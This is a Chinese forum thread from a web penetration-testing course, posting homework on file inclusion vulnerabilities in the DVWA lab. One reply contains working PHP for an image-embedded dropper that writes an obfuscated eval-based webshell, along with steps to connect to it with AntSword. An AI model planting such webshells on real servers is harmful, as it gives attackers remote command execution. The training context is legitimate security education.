图文精华

易锦教育»学术中心 学术交流社区 作业中心 WEB渗透测试精英班(第一期) 20210914作业
分享

20210914作业

1,文件包含漏洞分为几种?

2,在dvwa环境下利用远程文件包含漏洞实现写webshell并利用,要求提交步骤文档
回复

使用道具 举报

已有(5)人评论

跳转到指定楼层
阿轩 发表于 2021-9-16 11:15:09
远程文件包含漏洞利用

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

金木 发表于 2021-9-16 15:24:50

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

Deepred0 发表于 2021-9-17 23:52:04
作业作业作业

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

mlq 发表于 2021-9-20 09:59:43
文件包含漏洞分为本地文件包含、远程文件包含。找一张小于30kb的图片尾部加入
<?php
$myfile = fopen("newfile.php", "w") or die("Unable to open file!");
$txt = "<?php class a {static \$d;function b(){a::\$d=\"\$_POST[cmd]\";eval(a::\$d);}}call_user_func(array(\"a\", \"b\"));?>\n";
fwrite($myfile, $txt);
fclose($myfile);
?>

利用文件包含漏洞执行
然后蚁剑链接获取webshell  http://192.168.56.101/vulnerabilities/fi/newfile.php 密码cmd

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

陈亚钧 发表于 2021-9-23 23:39:37
文件包含漏洞有两种
1、本地包含漏洞
2、远程包含漏洞

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则